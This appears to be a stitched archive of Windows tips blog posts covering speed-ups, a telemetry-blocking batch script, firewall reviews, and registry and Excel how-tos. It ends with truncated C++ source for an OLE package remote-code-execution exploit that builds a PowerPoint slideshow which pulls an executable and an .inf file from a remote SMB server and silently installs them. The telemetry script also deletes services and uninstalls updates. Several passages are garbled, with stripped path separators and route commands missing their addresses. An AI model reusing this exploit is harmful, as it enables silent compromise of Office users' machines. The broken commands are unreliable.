Category Archives: Windows tricks

Speed Up a Slow Windows PC

Windows PCs don’t have to slow down over time. Whether your PC has gradually become slower or it suddenly ground to a halt a few minutes ago, there could be quite a few reasons for that slowness.

As with all PC issues, don’t be afraid to give your computer a reboot if something’s not working properly. This can fix quite a few problems and is faster than attempting to manually troubleshoot and fix the problem yourself.

Find Resource-Hungry Programs

Your PC is running slow because something is using up those resources. If it’s suddenly running slower, a runaway process might be using 99% of your CPU resources, for example. Or, an application might be experiencing a memory leak and using a large amount of memory, causing your PC to swap to disk. Alternately, an application might be using the disk a lot, causing other applications to slow down when they need to load data from or save it to the disk.

To find out, open the Task Manager. You can right-click your taskbar and select the “Task Manager” option or press Ctrl+Shift+Escape to open it. On Windows 8, 8.1, and 10, the new Task Manager provides an upgraded interface that color-codes applications using a lot of resources. Click the “CPU,” “Memory,” and “Disk” headers to sort the list by the applications using the most resources. If any application is using too much resources, you might want to close it normally — if you can’t, select it here and click “End Task” to force it to close.

Close System Tray Programs

Many applications tend to run in the system tray, or notification area. These applications often launch at startup and stay running in the background but remain hidden behind the up arrow icon at the bottom-right corner of your screen. Click the up arrow icon near the system tray, right-click any applications you don’t need running in the background, and close them to free up resources.

Disable Startup Programs

Better yet, prevent those applications from launching at startup to save memory and CPU cycles, as well as speed up the login process.

On Windows 8, 8.1, and 10, there’s now a startup manager in the Task Manager you can use to manage your startup programs. Right-click the taskbar and select “Task Manager” or press Ctrl+Shift+Escape to launch it. Click over to the Startup tab and disable startup applications you don’t need. Windows will helpfully tell you which applications slow down your startup process the most.

Reduce Animations

Windows uses quite a few animations, and those animations can make your PC seem a bit slower. For example, Windows can minimize and maximize windows instantly if you disable the associated animations.

To disable animations, press Windows Key + X or right-click the Start button and select “System.” Click “Advanced System Settings” on the left and click the “Settings” button under Performance. Choose “Adjust for best performance” under Visual Effects to disable all the animations, or select “Custom” and disable the individual animations you don’t want to see. For example, uncheck “Animate windows when minimizing and maximizing” to disable the minimize and maximize animations.

Lighten Your Web Browser

There’s a good chance you use your web browser a lot, so your web browser may just be a bit slow. It’s a good idea to use as few browser extensions, or add-ons, as possible — those slow down your web browser and cause it to use more memory.

Go into your web browser’s Extensions or Add-ons manager and remove add-ons you don’t need. You should also consider enabling click-to-play plug-ins. Preventing Flash and other content from loading will prevent unimportant Flash content from using CPU time.

Scan for Malware and Adware

There’s also a chance your computer is slow because malicious software is slowing it down and running in the background. This may not be flat-out malware — it may be software that interferes with your web browsing to track it and add additional advertisements, for example.

To be extra safe, scan your computer with an antivirus program. You should also scan it with Malwarebytes, which catches a lot of “potentially unwanted programs” (PUPs) that most antivirus programs tend to ignore. These programs try to sneak onto your computer when you install other software, and you almost certainly don’t want them.

Free Up Disk Space

If your hard drive is almost completely full, your computer may run noticeably slower. You want to leave your computer some room to work on your hard drive. Follow our guide to freeing up space on your Windows PC to free up room. You don’t need any third-party software — just running the Disk Cleanup tool included in Windows can help quite a bit.

Defragment Your Hard Disk

Defragmenting your hard disk actually shouldn’t be necessary on modern versions of Windows. It’ll automatically defragment mechanical hard drives in the background. Solid-state drives don’t really need traditional defragmentation, although modern versions of Windows will “optimize” them — and that’s fine.

You shouldn’t worry about defragmentation most of the time. However, if you do have a mechanical hard drive and you’ve just put a lot of files on the drive — for example, copying a huge database or gigabytes of PC game files — those files might be defragmented because Windows hasn’t gotten around to defragmenting them yet. In this situation, you might want to open the disk defragmenter tool and perform a scan to see if you need to run a manual defrag program.

Uninstall Programs You Don’t Use

Open the Control Panel, find the list of installed programs, and uninstall programs you don’t use and don’t need from your PC. This can help speed your PC up, as those programs might include background processes, autostart entries, system services, context menu entries, and other things that can slow down your PC. It’ll also save room on your hard drive and improve system security — for example, you definitely shouldn’t have Java installed if you’re not using it.

Reset Your PC / Reinstall Windows

If the other tips here didn’t fix your problem, the one timeless solution to fix Windows problems — aside from rebooting your PC, of course — is getting a fresh Windows installation.

On modern versions of Windows — that is, Windows 8, 8.1, and 10 — it’s easier to get a fresh Windows installation than ever. You don’t have to get Windows installation media and reinstall Windows. Instead, you can simply use the “Reset your PC” feature built into Windows to get a new, fresh Windows system. This is similar to reinstalling Windows and will wipe your installed programs and system settings while keeping your files.

If your PC is still using a mechanical hard drive, upgrading to a solid-state drive — or just ensuring your next PC has an SSD — will offer you a dramatic performance improvement, too. In an age where most people won’t notice faster CPUs and graphics processors, solid-state storage will offer the single biggest boost in overall system performance for most people.

Stop all of the telemetry servers – Microsoft Windows 10

Add the following lines below to your [c:windowssystem32driversetchosts] file in Windows 10. Make sure you open it from an elevated command prompt so you can save the changes! This will prevent all of the telemetry servers below from resolving so Microsoft Windows 10 will be unable to report your system data back to Microsoft. Take your privacy back!

Thank you,
Jerry (aka. Barnacules)
= Lines you need to add to your HOSTS file =
============================================       local

Certain Windows updates in Windows 10 deliver extra “options” for telemetry on your machine.

For a guide on how to disable several telemetry options already, visit this website:
Another resource is available at:
Certain Windows updates in Windows 10 deliver extra “options” for telemetry on your machine. It is advisable to uninstall them:
For additional privacy, you can add these entries to your hosts file, which is located in:
You can edit and save the file by opening Notepad as Administrator (Press Windows key (“flag” icon), in the search bar enter “notepad”, right-click on notepad and choose Run as Administrator – then browse to the hosts file location).
Note: this does NOT block any Windows Updates.
Copy and paste the following below all the other text in there, save the file. That’s all:
#Microsoft telemetry

Micro$oft Spy removal

Below is the list of “updates” that delivered by Windows Update as “telemetry and customer experience improvements”. If you don’t want upgrade to Win10 or send your “telemetry” to MS – remove them and do not install again.
Microsoft claims this is “telemetry” and customer experience blah-blah-blah. Well I call this simple – spyware. – “Performance tracker update” – “Get Windows 10 App” (delivers ready to use UAC backdoor as bonus) – “Upgrade to Windows 10” – “Upgrade to Windows 10” – “Compatibility update for upgrading Windows 7” – “Customer experience and diagnostic telemetry” – “Customer experience and diagnostic telemetry” – “Customer experience and diagnostic telemetry” – “Telemetry points to consent.exe” !!!WARNING!!! this update add spyware functionality to UAC
COPY/PASTE script below the line into you command shell/command line (cmd.exe). To disable the evil spying services spread by Microsoft.



@echo off
echo Step 1: Delete Updates…
echo Delete KB3075249 (telemetry for Win7/8.1)
start /w wusa.exe /uninstall /kb:3075249
echo Delete KB3080149 (telemetry for Win7/8.1)
start /w wusa.exe /uninstall /kb:3080149
echo Delete KB3021917 (telemetry for Win7)
start /w wusa.exe /uninstall /kb:3021917
echo Delete KB3022345 (telemetry)
start /w wusa.exe /uninstall /kb:3022345
echo Delete KB3068708 (telemetry)
start /w wusa.exe /uninstall /kb:3068708
echo Delete KB3044374 (Get Windows 10 for Win8.1)
start /w wusa.exe /uninstall /kb:3044374
echo Delete KB3035583 (Get Windows 10 for Win7sp1/8.1)
start /w wusa.exe /uninstall /kb:3035583
echo Delete KB2990214 (Get Windows 10 for Win7 without sp1)
start /w wusa.exe /uninstall /kb:2990214
echo Delete KB2990214 (Get Windows 10 for Win7)
start /w wusa.exe /uninstall /kb:2990214
echo Delete KB2952664 (Get Windows 10 assistant)
start /w wusa.exe /uninstall /kb:2952664
echo Delete KB3075853 (update for “Windows Update” on Win8.1/Server 2012R2)
start /w wusa.exe /uninstall /kb:3075853
echo Delete KB3065987 (update for “Windows Update” on Win7/Server 2008R2)
start /w wusa.exe /uninstall /kb:3065987
echo Delete KB3050265 (update for “Windows Update” on Win7)
start /w wusa.exe /uninstall /kb:3050265
echo Delete KB971033  (license validation)
start /w wusa.exe /uninstall /kb:971033
echo Delete KB2902907 (description not available)
start /w wusa.exe /uninstall /kb:2902907
echo Delete KB2976987 (description not available)
start /w wusa.exe /uninstall /kb:2976987
echo Step 2: Blocking Routes…
route -p add MASK
route -p add MASK
route -p add MASK
route -p add MASK
route -p add MASK
route -p add MASK
route -p add MASK
echo Step 3: Disabling tasks…
schtasks /Change /TN “MicrosoftWindowsApplication ExperienceAitAgent” /DISABLE
schtasks /Change /TN “MicrosoftWindowsApplication ExperienceMicrosoft Compatibility Appraiser” /DISABLE
schtasks /Change /TN “MicrosoftWindowsApplication ExperienceProgramDataUpdater” /DISABLE
schtasks /Change /TN “MicrosoftWindowsAutochkProxy” /DISABLE
schtasks /Change /TN “MicrosoftWindowsCustomer Experience Improvement ProgramConsolidator” /DISABLE
schtasks /Change /TN “MicrosoftWindowsCustomer Experience Improvement ProgramKernelCeipTask” /DISABLE
schtasks /Change /TN “MicrosoftWindowsCustomer Experience Improvement ProgramUsbCeip” /DISABLE
schtasks /Change /TN “MicrosoftWindowsDiskDiagnosticMicrosoft-Windows-DiskDiagnosticDataCollector” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMaintenanceWinSAT” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterActivateWindowsSearch” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterConfigureInternetTimeService” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterDispatchRecoveryTasks” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterehDRMInit” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterInstallPlayReady” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia Centermcupdate” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterMediaCenterRecoveryTask” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterObjectStoreRecoveryTask” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterOCURActivate” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterOCURDiscovery” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterPBDADiscovery” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterPBDADiscoveryW1” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterPBDADiscoveryW2” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterPvrRecoveryTask” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterPvrScheduleTask” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterRegisterSearch” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterReindexSearchRoot” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterSqlLiteRecoveryTask” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterUpdateRecordPath” /DISABLE
echo Step 4: Killing Diagtrack-service (if it still exists)…
sc stop Diagtrack
sc delete Diagtrack
echo Final Step: Stop remoteregistry-service (if it still exists)…
sc config remoteregistry start= disabled
sc stop remoteregistry
echo All done, go to reboot!


Top 7 firewall for windows

There are many tools out there to help you manage your firewall’s operations, but there aren’t too many free ones.

 Comodo Internet Security


free firewall programs

Comodo, always a popular choice , has merged its antivirus program with Firewall Pro, creating a free security program for everyone. If you are only interested in the firewall (or antivirus), the installer does let you opt out of either of the components.

PC Tools Firewall Plus Free Edition

free personal firewall

PC Tools Firewall Plus is a powerful personal free firewall that protects your computer from hackers and intruders. It can stop Trojans, backdoors, and keyloggers from damaging your computer and stealing your private information.

ZoneAlarm Free Firewall

free personal firewall

ZoneAlarm Free Firewall is an excellent tool for replacing the default Windows firewall. It’s always among the top 1 or 2 rated firewall programs and includes better outbound protection, antiphishing guards, and ZoneAlarm’s behavioral detection network.

Ashampoo FireWall Free

Ashampoo FireWall Free is an easy-to-use program that lets users control and prevent unwanted connections to the Internet. It has a tabbed interface that is easy to navigate and comes readily configured.

free personal firewall

The program provides automatic notifications when an app attempts to connect to the Internet and gives you the power to block or allow such actions. You can also go in and add rules for programs manually, along with viewing connection stats and logs.

With the Internet Cleaner feature, you can erase evidence of Internet activity as well.

Online Armor Free

Online Armor has all of the normal features of a firewall, but it also comes with a keylogger guard, tamper protection, script and worm protection, and autostart protection. It can defend you from a wide range of attacks, which can be pretty useful.

firewall programs

The program installs incredibly fast, and offers many initial settings and configurations during the start-up wizard so you can be all set right from the beginning.

Agnitum Outpost Firewall Free

firewall programs

Next up on the list is Outpost Firewall. This program offers many advanced features that you would usually only find with commercial software, including proactive protection against malware, control over installed applications’ activity, illegal termination prevention capabilities, policy correction for popular applications, and real-time network statistics.

Filseclab Personal Firewall Professional Edition

Filseclab Personal Firewall Professional Edition is another great free firewall. It can block most attacks from worm viruses and Trojans, as well as some main Adware and Spyware.

free firewall programs

It supports real-time monitoring, interactive rules creation, password protection, logging, live updates, and privacy protection. Windows Security Center integration, including balloon message alerts, are also among its unique features.

Microsoft Security Essentials and Windows Defender

Microsoft Security Essentials (MSE) is Microsoft’s free anti-virus software. It is designed to protect against malware and viruses on Windows XP, Vista, and 7, but in Windows 8 it has been discontinued and merged with Windows Defender.

In truth MSE has never been a robust anti-virus, receiving widespread criticism for covering the basics of malware protection and nothing more; we have always recommended that you should replace MSE with a more effective antivirus.


Sadly, Windows Defender does not fare much better than its forerunner. It looks and feels almost exactly like MSE, and like its predecessor offers little more than a barely acceptable minimum level of protection. You should unquestionably download and run and third party antivirus suite. Avast and AVG are popular, but if you’re not sure there are lots of excellent free antivirus alternatives, along with several sites that offer reliable antivirus reviews. You could even try a cloud-based antivirus program.

Stop Sharing Folders Without a Password

If there’s one thing you should remember about sharing on the network securely, it is this: never turn off password protected sharing. Force all network users who want to access what you are sharing to use the Homegroup or a username and password. This way, if an unwanted guest has access to your network, your shared data is safe from prying eyes.


Also, when sharing something on the network, using the Sharing Wizard or other tools that were covered in the Windows Networking class, avoid sharing with the user ‘Everyone.’ This user means anyone with or without a user account on your computer. Folders shared with this user account are easily accessed by anyone on your network, including unwanted guests who may have received or obtained access.


If you want to have a secure experience as well as an easy way to share folders on your home network, it is best to use the Homegroup feature. With it, you can quickly share just about anything, and your shared resources are accessed only by computers that know the Homegroup password and that have joined the Homegroup. Unwanted guests are left in the dark, unless they crack the Homegroup password and join it as well.


Multiple Ethernet profiles

1) Set up your network config for the first network option you want
2) Open a command prompt (Start/Run, type CMD, press enter)
3) Type CD, press enter so that you are pointed to the root of C:. This is only to make it easier to find the config files we’ll create. You can put them somewhere else if you’re comfortable with the file system.
4) At the command prompt, type netsh interface dump > netcfg1.txt, press enter
5) Change your network settings to your second option
6) At the command prompt again, type netsh interface dump > netcfg2.txt, press enter
7) In Explorer, navigate to C:, right click and select New/Text File, name it SetNetCfg1.bat, make sure that you remove the .txt extension that it will want to use by default.
8) Right click on the new batch file and select Edit. Enter the following command: netsh -f c:netcfg1.txt, save the file
9) Right click on the new batch file, drag it and select copy. Rename the copied file to SetNetCfg2.bat
10) Right click on the new batch file and select Edit. Enter the following command: netsh -f c:netcfg2.txt, save the file

You can either run the batch files directly or create shortcuts to them on your desktop.

EDIT: I just want to qualify something, I’m not sure if this works on Win7 or XP home. It does work on Pro and up.

Process Explorer v16.05


 Download Process Explorer
(1.07 MB)

Ever wondered which program has a particular file or directory open? Now you can find out. Process Explorer shows you information about which handles and DLLs processes have opened or loaded.

The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you’ll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you’ll see the DLLs and memory-mapped files that the process has loaded. Process Explorer also has a powerful search capability that will quickly show you which processes have particular handles opened or DLLs loaded.

The unique capabilities of Process Explorer make it useful for tracking down DLL-version problems or handle leaks, and provide insight into the way Windows and applications work.

Best recovery CD

Hiren’s BootCD

Hiren’s BootCD is pretty legendary, and anyone who’s ever worked in support or systems administration has probably used it at least once (or has several version of it lying around still.) The rescue disc is aimed squarely at repairing Windows systems, and includes a wealth of tools to that effect, including antivirus tools to scan your hard drive, anti-malware utilities to clean out spyware and adware, even rootkit detection tools. Hiren’s BootCD can also help you repair, adjust, or re-flash your system’s BIOS or wipe your CMOS, clean out temporary files and folders, securely erase files, back up your data to another hard drive or to the network, update and back up hardware drivers, scan your system for hardware failures, repair lost or damaged partitions, and much much more. We’re only scratching the surface here. It’s completely free and always has been. Even if there are other tools in your toolkit, Hiren’s BootCD should be among them.


The Trinity Rescue Kit

The Trinity Rescue Kit is a customized Linux distribution that’s designed specifically for troubleshooting and reviving ailing systems, whether you’re running Windows or Linux. It fits nicely on a CD (or a USB stick if you prefer) and once booted gives you tools to reset lost Windows passwords, scan hard drives for viruses and malware, clone drives, recover lost partitions, even open up the drives as network shares so you can get files off of them and to other computers on your network. It’s completely free, although a donation to the developer behind it is always appreciated and keeps the project alive.

How to Install Windows Store Apps to an SD Card or Another Drive

Windows 8 installs applications to your C: drive by default, but you may want to change where Windows 8 stores these apps. For example, you could install them to an SD card or secondary hard drive.

This works on both Windows 8 and Windows RT. It’s useful whether you are using a Microsoft Surface, another Windows 8 tablet, or just a computer with a small SSD and a larger secondary drive.
Prepare the New Drive
Before we begin, we must prepare the new install location. First, open a File Explorer window. Right-click the drive where you want to install Windows 8 apps – whether it’s an SD card, hard drive, or whatever else – and select Properties.


Ensure that the drive is formatted as NTFS.


If the drive isn’t formatted as NTFS, you will need to format the drive as NTFS to continue. (Many SD cards are formatted with the FAT file system instead.)

Back up any important data from the drive before continuing – formatting will delete all data on the drive. Right-click the drive and select Format.


Choose the NTFS file system and click Start.


You will want to create a folder for the apps on the drive. You can name it whatever you like, such as WindowsApps or Windows8Apps.


Change the Registry Setting
You will now need to open the registry editor. Press the Windows key, type regedit at the Start screen, and press Enter.

Navigate to the HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionAppx key.


Select the Appx key, click Edit, and click Permissions. (Ensure the Appx key is selected or you’ll modify permissions for another key instead!)


Click the Advanced button.


Click the Change link next to TrustedInstaller.


Type Administrators into the box, click Check Names, and click OK. This will give all administrators on the computer ownership of the registry key.


Enable the Replace owner on subcontainers and objects checkbox and click OK.


Select Administrators in the Permissions for AppX window and click the Allow option next to Full Control. Click OK and you will now be able to edit the appropriate registry setting.


Double-click the PackageRoot value in the right pane and enter the location of the folder you created earlier. That’s E:Windows8Apps in the case of our example.


Reboot your computer. Your changes won’t take effect until you reboot.


Move Old Apps to the New Location [Optional]
This will only affect apps you install in the future. Previously installed apps will remain at the old location. To move these apps to the new location, you can uninstall them from your computer and then reinstall them from the Windows Store.

Stored Procedure From Excel Sheet

Reports are one of the key requirements for management from any application whether it is a web application or Windows and they are interested to see it in Excel sheet. So, how about connecting an Excel sheet to a stored procedure and executing it directly from Excel sheet and get the result in the same sheet?

Yes, in this article, I am going to show you how to execute a stored procedure from Excel sheet. Let us consider a scenario where we have two tables in SQL Server database MyOrg, i.e., Department and Employee and say I want to execute a stored procedure GetAllEmpByDid as shown below:

Create procedure [dbo].[GetAllEmpByDid]
(@Did as int)
select * from Employee where Did=@Did

Now, below are the steps that we need to perform to execute the stored procedure “GetAllEmpByDid” from Excel sheet.

Step 1

Open an Excel sheet, then go to:

DATA -> From Other Sources -> From Microsoft Query

Step 2

Once you select From Microsoft Query option, it will fire a Choose Data Source popup. Now from Databases tab select and click OK.

Step 3

As you click OK, it will open another popup, i.e., Create New Data Source. Now give a name of data source, say “MTT” in textbox 1 and select driver as SQL Server from the dropdown list 2. Then click Connect button.

Step 4

Once you click Connect, it will open one more popup SQL Server Login now give the SQL Server name in Server text box “thinkpad-pcsqlexpress”, for valid server name it will enable Options button. Now click Options button.

Step 5

Clicking on Options button will dropdown a form Options. Now select the database name from Databases dropdown list, say “MyOrg”. Finally click OK.

Step 6

As soon as you click OK, it will close SQL Server Login. Now Click OK button of Create New Data Source popup, which will close Create New Data Source popup. Finally click OK button of Choose Data Source popup and it will close Choose Data Source popup and will open new popup, i.e., Query Wizard – Choose Columns.

Step 7

Now click Cancel button of Query Wizard – Choose Columns which will prompt an alert Microsoft Query just click Yes button. Which will prompt another popup Add Tables. Now click on Close button of Add Tables, it will leave you on Microsoft Query Popup Window.

Step 8

From Microsoft Query Popup Window, click SQL button to open SQL popup window. Write the below query in SQL Statement box and press OK. It will prompt Microsoft Query alert once again and again press OK.

//{CaLL DatabaseName.dbo.StoredProcedureName(one question mark for each parameter)} 
{CALL MyOrg.dbo.GetAllEmpByDid (?)}

Step 9

After pressing OK of Microsoft Query alert, it will prompt a Parameter value window. Just give some default value say “1003”. And press OK and it will execute that stored procedure and give you the result set in Microsoft Query Window.

Step 10

Now close the Microsoft Query window. It will prompt another window, i.e., Import Data. Finally press OK to generate data on Excel sheet.

Step 11

Now we are ready with our Excel sheet executing stored procedure. If you want to execute once again, then go to DESIGN -> and click Refresh. It will prompt a Parameter value window once again, now give some other value say “1004”. And press OK to produce new result.

Step 12

Now save the Excel sheet and close it. Whenever you want to execute the procedure, just open the Excel sheet and refresh (Alt+F5) it from DESIGN tab.


Thank you to

Mohd Manzoor Ahmed


Windows NT 6.X OLE package manager remote code execution through MS Office Powerpoint XYZ slideshow (ppts, pptxs).

  1. /*++
    Windows NT 6.X OLE package manager remote code execution through
    MS Office Powerpoint XYZ slideshow (ppts, pptxs).


    Undocumented features exist in Windows NT 6 OLE package manager.
    These features allow to bypass ‘Safe download’ mechanism from
    untrusted sources and to execute imm. The IContextMenu i-face
    is used by 3-rd party software (such as MS Office Powerpoint XYZ)
    to unpack and dispatch package data. Shell action to be applied
    to package is specified by action id in ‘cmd’ parameter of slide
    xml-based document. Action Id ‘-1’ and ‘-2’ are reserved by MS
    Office Powerpoint engine. Currently, silent ‘.inf’ installation
    is used for mitigation bypass. The MS Office for Windows XP
    contains internal OLE Package interpreter, so Windows XP doesn’t
    Hi F-5ecure and E5et! We are offering you to patch holes and
    backdoors in your fucking AV-s. We know about them.



    #include <Windows.h>
    #include <OleAuto.h>
    #include <stdio.h>
    #include <OAIdl.h>
    #include <string>
    #include <shldisp.h>
    #include <tlhelp32.h>
    #include <assert.h>

    using namespace std;

    #define MAKE_OFFICE_IMPORT 0

    #import “z:Program Files (x86)Common Filesmicrosoft sharedVBAVBA6VBE6EXT.OLB”
    #import “z:Program Files (x86)Common Filesmicrosoft sharedOFFICE12mso.dll”
    #import “z:Program Files (x86)Microsoft OfficeOffice12msppt.olb”

    /* Modify office headers after import.
    In file vbe6ext.tlh specify:
    #include “mso.tlh”
    using namespace Office;

    In file msppt.tlh specify:
    #include “vbe6ext.tlh”
    using namespace VBIDE;


    #if _DEBUG

    #include “Debugmso.tlh”
    #include “Debugvbe6ext.tlh”
    #include “Debugmsppt.tlh”


    #include “Releasemso.tlh”
    #include “Releasevbe6ext.tlh”
    #include “Releasemsppt.tlh”



    /* Processor definitions
    static HRESULT __G_hresult = S_OK;

    #define CHK_HR( hr ) do { if (FAILED(__G_hresult = (hr))) { goto _Done; } } while(0)

    #define CHK_ALLOC( ptr ) do { if ((ptr) == NULL) {goto _Done; } } while(0)

    #define SAFE_RELEASE_BY_REF( obj ) do { if((*obj) != NULL) { (*obj )->Release(); *obj = NULL;} } while(0)

    #define SAFE_FREE_BSTR_BY_REF( obj ) do { if((*obj) != NULL) { SysFreeString((*obj)); (*obj) = NULL;} } while(0)

    #define VariantInitAsLong( var, val)
    VariantInit( &(var) );
    (var).vt = VT_I4;
    (var).lVal = val;

    Rtns definition
    int wmain(int argc, wchar_t **argv);
    bool change_file_time(__in wchar_t *fname);
    void print_usage_and_exit(__in wchar_t *exe);
    bool produce_presentation(__in wchar_t *fname, __in wchar_t *fnameSaveAs, __in wchar_t *fname1Tmp, __in wchar_t *fname2Tmp);
    bool presentation_does_have_ole_packages(__in PowerPoint::_Presentation *pPresentation, __out bool *doesHave);
    bool create_ole_embed_stg_copy(__in const wchar_t *file_result, __in char *str1, __in char *str2);
    bool rewrite_embeddings_in_presentation(__in wchar_t *fnamePpt, __in wchar_t *fnameData);
    bool parse_cmd(int argc, wchar_t **argv, wstring *fnamePptIn, wstring *smbPath, wstring *fnameExe,wstring *fnameExeOnSmb,wstring *fnameInfOnSmb, bool *bForceUpload);

    Rtns implementation
    bool produce_presentation(__in wchar_t *fname, __in wchar_t *fnameSaveAs, __in wchar_t *fname1Tmp, __in wchar_t *fname2Tmp) {

    wstring stdWstrFileSaveAs;
    PowerPoint::PpSaveAsFileType saveAsType;
    bool bres = false,
    bDoesHaveOlePackages = false;
    CLSID appClsid = { 0 };
    BSTR bstrApplicationProgId = NULL,
    bstrPresentationPath = NULL,
    bstrSaveAs = NULL;
    PowerPoint::_Application *pApplication = NULL;
    PowerPoint::Presentations *pPresentations = NULL;
    PowerPoint::_Presentation *pPresentation = NULL;
    PowerPoint::Slides *pSlides = NULL;
    PowerPoint::_Slide *pSlide = NULL;
    PowerPoint::Shapes *pShapes = NULL;
    PowerPoint::Shape *pShape0 = NULL,
    *pShape1 = NULL,
    *pShapeCurr = NULL;
    PowerPoint::TimeLine *pTimeLine = NULL;
    PowerPoint::Sequences *pSequences = NULL;
    PowerPoint::Sequence *pSequence = NULL;
    PowerPoint::Effect *pEffect = NULL;
    PowerPoint::AnimationBehaviors *pAnimationBehaviors = NULL;
    PowerPoint::AnimationBehavior *pAnimationBehavior = NULL;
    PowerPoint::CommandEffect *pCommandEffect = NULL;
    PowerPoint::SlideShowTransition *pSlideShowTransition = NULL;
    VARIANT varSlideIndex;

    /* Produce file name for saving

    saveAsType = PowerPoint::PpSaveAsFileType::ppSaveAsOpenXMLShow;

    CHK_ALLOC( bstrApplicationProgId = SysAllocString(L”Powerpoint.Application”));

    /* Obtain POwerPoint App CLSID from PowerPoint App Identifier
    CHK_HR( CLSIDFromProgID( bstrApplicationProgId, &appClsid) );

    /* Create instance of POWERPOINT Application
    CHK_HR( CoCreateInstance(
    (LPVOID*)&pApplication) );

    /* Get presentation collection
    CHK_HR( pApplication ->get_Presentations(&pPresentations) );

    /* Open presentation
    CHK_ALLOC( bstrPresentationPath = SysAllocString(fname) );

    CHK_HR( pPresentations ->raw_Open(
    &pPresentation) );

    /* Make sure that presentation doesn’t have a lot of ole packages
    if (!presentation_does_have_ole_packages(pPresentation, &bDoesHaveOlePackages)) {

    CHK_HR( E_ABORT );

    if (bDoesHaveOlePackages) {

    printf(“[-] ERROR: Specified presentation already includes OLE objects or no slides found.n”);

    CHK_HR( E_ABORT );

    /* Get collection of slides

    CHK_HR( pPresentation ->get_Slides( &pSlides) );

    /* Get first slide by index
    VariantInitAsLong(varSlideIndex, 1);

    CHK_HR( pSlides ->raw_Item( varSlideIndex, &pSlide) );

    /* Get collection of shapes in slide
    CHK_HR( pSlide ->get_Shapes( &pShapes) );

    /* Add 1-th shape to slide as first OLE object
    CHK_HR( pShapes ->raw_AddOLEObject(
    100.0, -100.0, 30.0, 30.0,
    ) );

    /* Add 2-th shape to slide as second OLE object
    CHK_HR( pShapes ->raw_AddOLEObject(
    150.0, -100.0, 30.0, 30.0,
    ) );

    /* Configure slide timing
    CHK_HR( pSlide ->get_TimeLine( &pTimeLine ) );

    /* Obtain Main Sequence for timeLine of slide
    CHK_HR( pTimeLine ->get_MainSequence( &pSequence) );

    /* Produce first effect for 1-th shape.
    1-th shape specifies OLE Object which just copies .exe payload
    from remote SMB server and stores in temporary file.
    Specify command verb as ‘-3’ which tells to ShellApi do nothing.
    Effect with id 1 loads slide background.
    Effect with id 2 loads exe stub from remote server.
    CHK_HR( pSequence ->raw_AddEffect(
    PowerPoint::MsoAnimTriggerType::msoAnimTriggerWithPrevious, //PowerPoint::MsoAnimTriggerType::msoAnimTriggerOnPageClick,
    &pEffect) );

    SAFE_RELEASE_BY_REF( &pEffect );

    CHK_HR( pSequence ->raw_AddEffect(
    PowerPoint::MsoAnimTriggerType::msoAnimTriggerAfterPrevious, //PowerPoint::MsoAnimTriggerType::msoAnimTriggerOnPageClick,
    &pEffect) );

    CHK_HR( pEffect ->get_Behaviors( &pAnimationBehaviors) );

    CHK_HR( pAnimationBehaviors ->raw_Add( PowerPoint::MsoAnimType::msoAnimTypeCommand, 1, &pAnimationBehavior) );

    CHK_HR( pAnimationBehavior ->get_CommandEffect( &pCommandEffect) );

    CHK_HR( pCommandEffect ->put_Type( PowerPoint::MsoAnimCommandType::msoAnimCommandTypeVerb) );

    CHK_HR( pCommandEffect ->put_Command( _bstr_t(L”-3″)) );

    /* Release resources assigned with Shape0
    SAFE_RELEASE_BY_REF( &pCommandEffect );
    SAFE_RELEASE_BY_REF( &pAnimationBehavior );
    SAFE_RELEASE_BY_REF( &pAnimationBehaviors );
    SAFE_RELEASE_BY_REF( &pEffect );
    SAFE_RELEASE_BY_REF( &pShape0 );

    /* Produce first effect for 2-th shape.
    2-th shape specifies OLE Object which simple copies .inf file
    from remote SMB server and stores in temporary file with .inf extension.
    Specify command verb as ‘3’ which tells to ShellApi do ‘Install’ action.
    Effect with id 3 loads .inf from remote server and start it.
    CHK_HR( pSequence ->raw_AddEffect(
    &pEffect) );

    CHK_HR( pEffect ->get_Behaviors( &pAnimationBehaviors) );

    CHK_HR( pAnimationBehaviors ->raw_Add( PowerPoint::MsoAnimType::msoAnimTypeCommand, 1, &pAnimationBehavior) );

    CHK_HR( pAnimationBehavior ->get_CommandEffect( &pCommandEffect) );

    CHK_HR( pCommandEffect ->put_Type( PowerPoint::MsoAnimCommandType::msoAnimCommandTypeVerb) );

    CHK_HR( pCommandEffect ->put_Command( _bstr_t(L”3″)) );
    /* Release resources assigned with Shape1
    SAFE_RELEASE_BY_REF( &pCommandEffect );
    SAFE_RELEASE_BY_REF( &pAnimationBehavior );
    SAFE_RELEASE_BY_REF( &pAnimationBehaviors );
    SAFE_RELEASE_BY_REF( &pEffect );
    SAFE_RELEASE_BY_REF( &pShape1 );

    /* Configure SlideShowTransition

    CHK_HR( pSlide ->get_SlideShowTransition(&pSlideShowTransition) );

    CHK_HR( pSlideShowTransition ->put_EntryEffect( PowerPoint::PpEntryEffect::ppEffectBoxOut ) );

    CHK_HR( pSlideShowTransition ->put_AdvanceTime( 0.5 ) );

    SAFE_RELEASE_BY_REF( &pSlideShowTransition );

    /* Release resources assigned with Presentation
    SAFE_RELEASE_BY_REF( &pSequence );
